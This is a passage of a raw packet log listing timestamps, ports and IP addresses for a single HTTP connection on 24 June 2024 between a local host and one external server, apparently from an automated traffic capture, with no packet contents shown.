Jun 24, 2024 00:10:07.198438883 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198455095 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198477030 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198483944 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198509932 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198522091 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198545933 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198564053 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198580980 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198596954 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198615074 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198632956 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198646069 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198661089 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198681116 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198693037 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198714972 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198725939 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198755026 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198765039 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198790073 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198801041 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198823929 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198842049 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198875904 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224644899 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224657059 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224669933 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224682093 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224709988 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224744081 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224800110 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224812984 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224824905 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224831104 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224838972 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224853992 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224865913 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224896908 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224904060 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224916935 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224929094 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224939108 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.224944115 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224970102 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.224994898 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225203037 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225214005 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225224972 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225260019 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225285053 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225393057 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225405931 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225416899 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225430012 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225449085 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225480080 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225487947 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225500107 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225511074 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225523949 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225544930 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225563049 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225688934 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225697994 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225734949 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225739956 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225748062 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225775003 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225802898 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225910902 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225923061 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225934029 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225945950 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.225975037 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.225995064 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226006985 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226007938 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226026058 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226037979 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226038933 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226066113 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226119041 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226188898 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226198912 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226222038 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226239920 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226244926 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226252079 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226263046 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226274014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226286888 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226289034 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226298094 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226325989 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226344109 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226389885 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226402998 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226413965 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226425886 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226438046 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226460934 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226476908 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226551056 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226562977 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226574898 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226583004 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226612091 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226638079 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226700068 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226738930 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226761103 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226773024 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226804018 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226829052 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226840973 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226851940 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226865053 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226876020 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.226881027 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226912975 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.226924896 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227042913 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227054119 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227063894 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227075100 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227087021 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227099895 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227099895 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227118969 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227127075 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227132082 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227145910 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227147102 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227173090 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227197886 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227379084 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227391005 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227404118 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227426052 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227442980 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227488041 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227499962 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227509975 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227520943 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227540970 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227571011 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227821112 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227833033 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227844000 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227855921 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227865934 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227869987 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227880955 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227883101 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227900028 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227910995 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227912903 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227921963 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.227926016 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.227957964 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.228286028 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228298903 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228312016 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228337049 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.228362083 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.228562117 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228576899 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228586912 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228599072 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.228615046 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.228646040 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290064096 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290143967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290255070 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290266037 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290277004 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290283918 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290296078 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290307999 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290318012 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290321112 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290329933 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290340900 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290352106 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290357113 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290364027 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290375948 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290394068 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290400028 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290400028 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290414095 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290426016 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290426970 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290438890 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290443897 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290450096 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290462017 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290472984 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290493965 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290509939 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290524006 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290535927 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290545940 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290555954 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.290572882 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290590048 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.290621996 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317158937 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317177057 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317197084 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317209959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317220926 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317231894 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317244053 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317255974 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317290068 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317342997 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317353010 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317364931 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317375898 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317387104 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317398071 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317409992 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317471027 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317514896 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317514896 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317516088 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317516088 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317516088 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317572117 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317583084 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317595005 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317608118 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317609072 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317629099 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317648888 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317694902 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317742109 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317749023 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317791939 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317795038 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317806959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317820072 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317830086 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317856073 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317881107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317903042 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317915916 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317951918 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317970991 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317970991 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.317984104 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.317996025 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318022966 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318044901 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318110943 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318121910 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318131924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318142891 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318171978 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318195105 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318296909 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318315029 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318331957 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318342924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318346024 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318353891 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318363905 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318373919 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318381071 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318387032 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318411112 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318468094 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318480015 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318490982 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318502903 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318505049 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318532944 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318533897 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318557978 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318737984 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318748951 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318761110 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318798065 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318821907 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318833113 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318845034 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318856001 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318873882 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318886042 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318893909 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318918943 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318938971 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.318965912 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.318979025 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319015026 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319039106 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319108009 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319123030 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319164991 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319190025 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319242001 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319253922 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319264889 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319274902 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319288015 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319298983 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319312096 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319344997 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319344997 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319479942 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319490910 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319500923 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319513083 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319526911 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319541931 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319572926 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319614887 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319667101 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319694996 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319708109 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319719076 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319732904 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319744110 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.319752932 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319832087 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.319832087 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320061922 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320074081 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320085049 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320096970 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320110083 CEST	80	49706	77.91.77.81	192.168.2.5
